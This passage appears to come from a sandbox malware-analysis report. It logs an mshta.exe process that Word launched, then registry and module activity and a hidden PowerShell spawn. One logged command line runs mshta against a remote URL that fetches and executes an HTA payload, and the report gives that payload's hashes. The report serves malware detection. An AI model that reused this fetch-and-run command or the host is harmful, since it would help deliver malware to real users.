| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Info | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | |
| Module | Load | module_name = ieframe.dll, base_address = 0x7fef2350000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = ieframe.dll, base_address = 0x7fef2350000 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Time | type = Ticks, time = 131181 |
|
250 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 131181 |
|
1 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 131196 |
|
2 | |
| COM | Create | interface = BB1A2AE1-A4F9-11CF-8F20-00805F2CD064, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = System Time, time = 2017-10-24 17:38:03 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 131243 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x7fefe1c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefe1e7490 |
|
1 | |
| COM | Create | interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 131274 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 2, address_out = 0x7fefde73480 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefe1c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefe1da4c4 |
|
1 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WsCriPt.SHeLl |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefe1f2e18 |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| System | Get Time | type = System Time, time = 2017-10-24 17:38:03 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 131493 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | module_name = IEXPLORE.EXE, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 261 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x7fefe850000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = ShellExecuteExW, address_out = 0x7fefe877c70 |
|
1 | |
| Process | Create | process_name = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
3 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| Module | Load | module_name = oleaut32.dll, base_address = 0x7fefde70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VariantClear, address_out = 0x7fefde71180 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x7feff5e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\wininet.dll, function = InternetUnlockRequestFile, address_out = 0x7feff5f70f4 |
|
1 | |
| Module | Get Handle | module_name = mscoree.dll, base_address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = mshtml.dll, base_address = 0x7fee0880000 |
|
1 | |
| System | Get Time | type = Ticks, time = 131134 |
|
1 | |
| System | Get Time | type = Ticks, time = 131196 |
|
2 | |
| System | Get Time | type = Ticks, time = 151367 |
|
1 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\mshta.exe |
| Command Line | "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:02, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:34 |
| Information | Value |
|---|---|
| PID | 0xbc8 |
| Parent PID | 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BCC
0x
BDC
0x
BEC
0x
BF0
0x
BF4
0x
BF8
0x
80C
0x
81C
0x
83C
0x
864
0x
7B0
0x
518
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\t[1].hta | 3.24 KB (3313 bytes) |
MD5:
13b131d98fea2526196b20496ec68b0a
SHA1: 1284d7400f30f5a2c409f3f53fcf34b30c32268d SHA256: ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2017-10-24 17:37:59 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 127296 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0xff9d0000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x776fc4a0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, data = C:\Windows\System32\mshtml.dll, type = REG_SZ |
|
1 | |
| Module | Load | module_name = C:\Windows\System32\mshtml.dll, base_address = 0x7fee0880000 |
|
1 | |
| System | Get Time | type = System Time, time = 2017-10-24 17:37:59 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 127546 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | |
| Module | Get Filename | module_name = C:\Windows\System32\mshtml.dll, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshtml.dll, size = 260 |
|
1 | |
| File | Open Mapping | filename = #MSHTML#PERF#00000BC8, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\advapi32.dll, base_address = 0x7feff8e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventWrite, address_out = 0x7782b510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventRegister, address_out = 0x7783cac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventUnregister, address_out = 0x77823c80 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0xff9d0000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\mshta.exe, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = RegisterApplicationRestart, address_out = 0x7775f510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\mshtml.dll, function = RunHTMLApplication, address_out = 0x7fee0ad5b90 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x7fefc060000 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
2 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
